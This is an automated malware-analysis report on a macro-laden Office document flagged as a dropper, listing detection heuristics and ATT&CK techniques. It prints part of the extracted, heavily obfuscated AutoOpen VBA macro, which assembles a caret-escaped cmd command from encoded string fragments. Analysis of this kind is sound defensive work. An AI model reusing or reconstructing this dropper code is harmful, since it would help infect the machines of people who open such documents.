Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic); T1204.002 (Malicious File)
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened. The macro calls the Shell() function, a critical indicator of malicious intent, suggesting it is designed to download and execute a second-stage payload. The 'Doc.Dropper.Valyria-6665650-0' ClamAV signature further supports its classification as a dropper.
Heuristics (7)
- ClamAV: Doc.Dropper.Valyria-6665650-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Valyria-6665650-0
- VBA macros detected [medium; 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12002 bytes | 4ee5cff1227b54e1138c07da3db83c9ecedfe20f4612e071a4a68ee2e8b17500 |
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "GftfQPiRZId" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "TVvHWaP" Function lWQDZBw() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error 50074 / THdOU cBOQwUzJYk = "MD /v" + "^:^o /" + "c " + Chr(5 + 2 + 1 + 5 + 21) + " " + "^S^" + "et " + "^ ^ 6" + "^8" + "^FE=^A^" Error 5601 / wtdJk Error 50019 * 88335 / 14501 / DzdDOo Error 43819 * 70449 / 73934 / wuEtMS Error wHETpL / uvmEXG / bGAjIq * vuGKwo Error 5990 / HdkjP ZspWEST = "AC" + "A^g^" + "AA^" + "IA^" + "ACA^gA^" + "A" Error zJsXw * BiaTJ / YrLuF * URJav WqzPtVZtH = "^IA" + "A" + "CA^g^" + "AAI^AAC" + "A^g" + "^AA^I^A" + "^AC^" + "A^" + "gAAI" + "^A^ACA" + "gA^" + "Q^f^A" + "^0H" Error bAiUTm / qRfwja Error 53343 / Fviku DHzYNHfafcq = "^A^" + "7" + "^BA^a" + "^A^" + "MG" + "A0^BQ^Y" + "^" + "A^M^G" Error jqDUzd / kVTuQ / wsntR / uHvaF Error 67722 / SqjDX Error lSsAAG * Wqiajz Error IuLjBl * aJtzCO * 11284 * iXhFqw LbXBcupTs = "A" + "9^BwOA^" + "sG^" + "A" + "^hB^Q^Z" Error FmJIo / JljOVn * 18872 * WfQpdD Error 75136 / zqYdA Error 91055 * OlijlP Error DVGYo * Jlanz * qCGJZX / zIziwQ Error kdJiP * 92990 / XmzHp * iVKNV EozqB = "^A^I" + "H^A^iB" + "^w^O^A^" + "8^G^Am^" + "B^QRAQC" + "^A^g^A" + "Q^b" + "AU" + "G" Error 2243 / lnToXb * 38409 / THptXs Error zJJbVi * KIBUFz Error 17363 / qKwfDn / 13460 / 6079 piWjEMPM = "^A^" + "0^B^Q" + "S^A" + "0CA^" + "l^B^w" + "^aA8G^A" Error 15047 * pmmPE Error pmYLPw * PklYXp wlNJwWGsvIk = "2^Bg" + "bAk" + "E^A^7^" + "AQK^A^8" + "^GA^m^" Error 67093 * ibzjYu * 33525 * JBvZRQ Error JCOiz * kTNhq Error hiNRCM / KPYAFJ / nafLH / PYmip IDqaobhc = "BQR^" + "A^QC^A" + "gAA^L^A" + "YGA^" + "U^" + "B^" + "g^e^" lWQDZBw = cBOQwUzJYk + 
ZspWEST + WqzPtVZtH + DHzYNHfafcq + LbXBcupTs + EozqB + piWjEMPM + wlNJwWGsvIk + IDqaobhc Error 40127 / 88680 * 10948 / GiJsj Error QZHmji / 83677 Error 24710 * auUBPA * URaRu * QAuLiC Error UUXpdj * tHbGO Error SjpLuh * TkotzZ End Function Function rcEqw() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error HVZss * HjPVWG Error lqDTD * 26442 Error mOjUSq / BGzwp / 57658 / EIoUJ Error DAUtE / 47577 waATqiB = "AQCA^o" + "^AQ" + "^Z" + "^" + "Aw^" + "GAp^BgR" + "AQG" + "^A^" + "h^B^wb" + "^A^" Error BUrdbi / KBITaE * bujioZ * tOjbYi Error KPTtk / kJYnA Error zYiitG / 53884 Error JtsTGX / WHPUl cSETwHw = "wG^A" + "^u^Bw^" + "d^A^" + "8G" + "^A" + "^E^" + "B^g^L^" + "A" Error 36140 / 37581 Error 400 / FSvPO Error KCCzQ / 55560 * OaHwQG * 46108 Error 91359 * ERIfzO ORSWkWjtfJ = "YE^A^D^" + "BgV^A^" + "QC" + "^" + "A^" + "7B^Qe^" Error 89953 / 39394 / MhFTNO * CtuXCB Error 77267 / SKpST Error 24780 / UPUvo Error tVpCBs * XFwSf / Idwkd / kSPlF Error 56235 * SWrTE TQzZoNMZU = "A" + "IH^" + "A^" + "0Bwe" + "A^kC^" + "AyB^g^U" + "A8^" + "GA^k^A" + "^A^IA4" Error 99762 / jGKasK Error VujOtQ / mYjuYi * 69486 * WMjtMQ imJHjzHHrCh = "^G" + "A^pB^" + "AI^AYG" + "^A^UB^" + "g^" + "eA^" + "QC^" + "A" + "^o^" + "AA" Error mVGXGw / 68337 / unfnGW / OVKQOU Error 15659 * PLzZR / NCujp / 8596 Error nOrzN / 71393 * 31515 * iiboW TwHoloMnl = "a" + "^A^MGA" + "h" + "^BQ" + "^Z^A" + "I^" Error 17832 * NzTIP / 98229 * EdhAE Error KjaQJu * wqIjNf Error 66414 / 44660 IvMMtlCXB = "H^Av" + "^" + "B^g^" + "Z^" + "AsD" rcEqw = waATqiB + cSETwHw + ORSWkWjtfJ + TQzZoNMZU + imJHjzHHrCh + TwHoloMnl + IvMMtlCXB Error 24933 / ZkhOKJ Error 61447 / iuIOs * 69123 * IEFCar Error buaRHl / izhaU / iaYUq / zbHJi End Function Function XmwKUJnQi() On _ Error _ Resume _ ... (truncated) |